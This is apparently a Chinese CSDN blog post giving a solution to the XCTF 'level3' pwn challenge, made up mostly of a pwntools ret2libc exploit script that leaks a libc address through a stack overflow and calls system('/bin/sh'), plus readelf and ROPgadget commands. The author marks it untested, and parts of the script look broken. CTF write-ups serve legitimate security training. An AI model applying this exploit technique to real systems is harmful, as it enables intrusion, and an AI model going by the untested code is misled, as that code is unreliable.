xctf之level3

最新推荐文章于 2022-12-24 17:08:25 发布
最新推荐文章于 2022-12-24 17:08:25 发布
阅读量772 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/neuisf/article/details/103830161
版权

未调试,可能由错误!

from pwn import *
from LibcSearcher import *

p=process('./level3')
elf=ELF("./level3")
write_plt=elf.plt["write"]
read_plt=elf.plt["read"] #0x8048310

print "readplt:"+str(hex(read_plt))
target_func=elf.got['write']
bin_sh_addr=0x0804b000-8
start_addr=0x804848e
write_payload='a'*136+p32(0x0)+p32(read_plt)+p32(start_addr)+p32(0x00000000)+p32(bin_sh_addr)+p32(0x00000008)
p.sendafter("Input:\n",write_payload)
print "arrive B"
payload='a'*136+p32(0x0)+p32(write_plt)+p32(start_addr)+p32(0x00000001)+p32(target_func)+p32(0x00000008)
p.sendline(payload)
write_addr= u32(p.recv()[:4])
print "write_addr:"+str(hex(write_addr))
print "arrive C"

#libc=LibcSearcher("write",write_addr)
base_addr=write_addr-0x000d43c0
print "base_addr:"+str(hex(base_addr))
sys_addr=base_addr+0x0003a940
payload='a'*136+p32(0x0)+p32(sys_addr)+p32(start_addr)+p32(bin_sh_addr)
p.sendline("Input:\n",payload)
p.interactive()

寻找system偏移量:

 readelf -s pwn/libc_32.so.6|grep system
 

寻找system偏移量:

ROPgadget --binary pwn/libc_32.so.6 --string "/bin/sh"

neuisf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF|pwn栈溢出入门题level3解题思路及个人总结
skyattractive的博客
06-02 2302
CTF|pwn栈溢出入门题level3解题思路及个人总结 解题思路 拿到题目将文件下载下来拖入ubuntu 发现这一次的文件比较特殊:是一个linux环境下的压缩包,自然而然想到的是解压它 通过命令行tar -xvf level.tar 将其解压出来 发现有两个文件:level和libc 都拖入IDA 特殊的地方在:本题没有直接给出system和bin/sh的位置,但是文件中有个write函数可以利用 我们IDA打开libc文件(关于libc文件是什么有什么 会在总结写到) 总体思路为:我们通过r
【ctf】xctf攻防世界level3!!
elsa________的博客
04-05 1560
level3题解: 首先,检查一下程序基本信息: 程序很简单,保护开的也差不多。但是需要注意,这道题单独给出了libc,而且根据题目提示,程序中没有现成的system函数。这就需要我们从libc中动态加载system函数。 初步思路:PIE没有开启,那么在libc中函数的offset就是固定的,只要确认了libc的base address,然后计算出system函数的offset,就可以定位...
CTF之PWN学习入门
11-02
  从基础开始,一步步教同学们从基础的栈溢出,栈溢出的原理以及在64位程序与32位程序下,如何去构造EXP,以及在有一般保护的情况下如你构造ROP链,在没有binsh与system函数的情况下如何去构造泄露如put,printf,write等函数的真实地址。然后教大家格式化字符串漏洞的利用,在开启canary下即存在栈溢出与格式化漏洞的情况下如保构造EXP来打通获取一个shell。学完课程同学们能够掌握格式化字符串漏洞与栈溢出漏洞的原理以及如何去构造EXP,掌握原理。
xctf level3--沙窝李的王
weixin_43600412的博客
07-26 949
通过直接实战学习知识,这还是第一次这样学习,感觉到了压力-_-… level3 可以看到NX保护打开,也就是不能在栈中执行指令辽。 由于不知道NX保护的原理机制,特查询如下: NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。...
[WUSTCTF2020]level3题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-24 427
[WUSTCTF2020]level3题解
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XCTF-Mobile】新手练习区-08-app3.rar
08-30
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5087&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/app3
writeup:xctf撰写
03-28
写上去xctf撰写
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
哟哟哟哟哟哟
09-24 1234
1、log信息共有四个等级,按重要性递增为: INFO(通知)<WARNING(警告)<ERROR(错误)<FATAL(致命的); 2、值的含义:不同值设置的是基础log信息(base_loging),运行时会输出base等级及其之上(更为严重)的信息。具体如下: base_loging 屏蔽信息 输出信息 “0” INFO 无 ...
xctf pwn 踩坑笔记(一):以xctf入门题level3为例
xiongzixun的博客
10-30 496
操作环境:ubuntu16.04 +惠普台式机 IDA环境:win10 +联想笔记本** 1.打开文件 xctf中的附件一般为application/octet-stream 而且为了能够使用,我们必须要先通过chmod命令获得X权限 如果是压缩文件还要先unzip或者tar等试一下 然后,通过checksec 这个文件以后,一定要先关注Arch,也就是这个ELF究竟是64位,还是32位。 因...
level3 [XCTF-PWN]CTF writeup系列11-新手练习区大结局
重新启程
12-20 953
题目地址:level3 看看题目内容 从题目中可以看出,本题应该是一个没有提供system函数地址的栈溢出题目,那么我们本题的考点应该是从libc中提取system函数地址。 照例检查保护机制 root@mypwn:/ctf/work/python# checksec level3 [*] '/ctf/work/python/level3' Arch: i386-3...
level3(xctf)
weixin_43868725的博客
05-06 470
0x0 程序保护和流程 保护: 流程: main() vulnerable_function() 很明显的栈溢出。 0x1 利用过程 整个程序中没有我们能利用的部分,但是题目给我们提供了一个libc。所以可以通过泄露got表的地址获取libc的基地址。libc中有system()函数,还有"/bin/sh"。因此我们先使用write()泄露got表中的地址计算出libc的基地址调用完成之后返...
level3
weixin_33690963的博客
04-02 213
伸冤下:老师的评论是有看到!看完我就去修改程序了,忘记回复请原谅!= = 前阵子都在修改功能和思路,但是由于一个细节的错误找不到,导致没有成品可以上传...求谅解。 细心真的很重要 = =!!! import java.util.Scanner; public class Main { public static void main(String[] a...
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 375
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
CTF-PWN-level3(Jarvis OJ)
SuperGate的博客
02-15 459
发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。 checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。 基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出...
level_0 [XCTF-PWN]CTF writeup系列5
重新启程
12-19 628
题目地址:level_0 先看下题目: 照例查看一下保护情况 root@mypwn:/ctf/work/python# checksec df928e471d0849fab9ff0ebe4bfe5ea1 [*] '/ctf/work/python/df928e471d0849fab9ff0ebe4bfe5ea1' Arch: amd64-64-little R...
2018福建省“百越杯”CTF初赛writeup
SWEET0SWAT的博客
12-03 4558
2018福建省“百越杯”CTF初赛writeup PWN Boring Game 题目描述 nc 117.50.59.220 12345 解题经过下载下来后有两个文件pwn和libc.so.6。所以很明显是RET2LIBC的类型 检查文件安全性 程序源代码 int __cdecl main(int argc, const char **argv, const char **envp) { ...
PWN基础3:内存保护概述 和 溢出实例
prettyX的博客
07-05 741
0x01 概述 1、操作系统提供了很多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险 (1)Stack Canary 栈溢出保护 是一种针对缓冲区溢出攻击的缓解手段。当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让Shellcode能够得到执行。当启用栈保护后,函数开始执行的时候,会先往栈里插入Cookie信息,当函数真正返回的时候会验证Cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的是否往往也会将Cookie信息给覆盖掉,导致栈保护检查失败而阻止Sh
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值